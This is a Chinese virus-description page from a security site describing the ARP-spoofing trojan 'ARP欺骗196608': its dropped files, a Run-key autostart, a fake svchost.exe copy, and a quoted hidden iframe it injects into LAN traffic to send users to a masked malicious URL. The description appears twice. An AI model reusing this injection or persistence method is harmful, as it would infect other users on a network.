ARP欺骗196608
新客网 XKER.COM 2007-10-30 收藏本文
Win32.Hack.Delf.196608
病毒名称(中文):
ARP欺骗196608病毒别名:
威胁级别:
★★☆☆☆病毒类型:
网页病毒病毒长度:
196608影响系统:
Win9x WinMe WinNT Win2000 WinXP Win2003
病毒行为:
这是一个ARP病毒。只要中了该病毒,在局域网内的机器打开浏览器浏览网页时,毒霸会一直报病毒。该病毒
利用传送数据包时嵌入带病毒的HTML代码,访问恶意网址下载恶意病毒。
1. 病毒运行后,首先释放以下病毒文件
%Systemroot%system32\Packet.dll
%Systemroot%system32\wpcap.dll
%Systemroot%system32\WanPacket.dll
%Systemroot%system32\Drivers\npf.sys
2. 创建自启动
在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下
创建 KVP 项,启动参数为: C:\WINDOWS\system32\drivers\svchost.exe
3. 该病毒会将自身复制到 %Systemroot%system32\Drivers\svchost.exe.
并运行 %Systemroot%system32\Drivers\svchost.exe, 之后又把 scvhost.exe
(注: 与 svchost.exe 区分开来),释放到%Systemroot%system32\Drivers 目录下.
4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:
iframe src='http://www.z****0.com/0.htm' width=0 height=0
使局域网其它用户访问其恶意网址.
4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:
使局域网其它用户访问其恶意网址.
病毒名称(中文):
ARP欺骗196608病毒别名:
威胁级别:
★★☆☆☆病毒类型:
网页病毒病毒长度:
196608影响系统:
Win9x WinMe WinNT Win2000 WinXP Win2003
病毒行为:
这是一个ARP病毒。只要中了该病毒,在局域网内的机器打开浏览器浏览网页时,毒霸会一直报病毒。该病毒
利用传送数据包时嵌入带病毒的HTML代码,访问恶意网址下载恶意病毒。
1. 病毒运行后,首先释放以下病毒文件
%Systemroot%system32\Packet.dll
%Systemroot%system32\wpcap.dll
%Systemroot%system32\WanPacket.dll
%Systemroot%system32\Drivers\npf.sys
2. 创建自启动
在 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 下
创建 KVP 项,启动参数为: C:\WINDOWS\system32\drivers\svchost.exe
3. 该病毒会将自身复制到 %Systemroot%system32\Drivers\svchost.exe.
并运行 %Systemroot%system32\Drivers\svchost.exe, 之后又把 scvhost.exe
(注: 与 svchost.exe 区分开来),释放到%Systemroot%system32\Drivers 目录下.
4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:
iframe src='http://www.z****0.com/0.htm' width=0 height=0
使局域网其它用户访问其恶意网址.
4. 往同一网关内的所有 IP 的数据包内插入以下 HTML 代码:
使局域网其它用户访问其恶意网址.
上一篇:梦幻之盗15360 下一篇:agentsvr.exe病毒
相关文章发表评论
评论内容:不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
阅读排行
·mDNSResponder.exe
·瑞星杀毒软件2007单机版
·lmgrd.exe
·QQ大盗
·Deepfish
·Win32.Troj.Downloader.ho
·五笔数码输入法
·wupdmgr.exe
·TouchNet Browser
·网上邻居
·QQ蜜
·spoolsv.exe
·9Sy.exe
·clipbrd.exe
·瑞星杀毒软件2007
·瑞星杀毒软件2007单机版
·lmgrd.exe
·QQ大盗
·Deepfish
·Win32.Troj.Downloader.ho
·五笔数码输入法
·wupdmgr.exe
·TouchNet Browser
·网上邻居
·QQ蜜
·spoolsv.exe
·9Sy.exe
·clipbrd.exe
·瑞星杀毒软件2007
专题教程
最新文章
·Trojan/PSW.Nilage.bby
·QQ盗号木马
·Trojan/PSW.QQPass.rfx
·TrojanDownloader.Tiny.cy
·Trojan/PSW.Moshou.agh
·Trojan/PSW.LdPinch.amg
·恶意共享软件
·auto病毒
·AVG
·TrojanProxy.Lager.ie
·Trojan/DiskAutorun.bq
·Trojan/VB.Small.abv
·Trojan/PSW.QQPass.cvd
·TrojanDownloader.Pakes.g
·TrojanDropper.VB.he
·QQ盗号木马
·Trojan/PSW.QQPass.rfx
·TrojanDownloader.Tiny.cy
·Trojan/PSW.Moshou.agh
·Trojan/PSW.LdPinch.amg
·恶意共享软件
·auto病毒
·AVG
·TrojanProxy.Lager.ie
·Trojan/DiskAutorun.bq
·Trojan/VB.Small.abv
·Trojan/PSW.QQPass.cvd
·TrojanDownloader.Pakes.g
·TrojanDropper.VB.he
实用信息推荐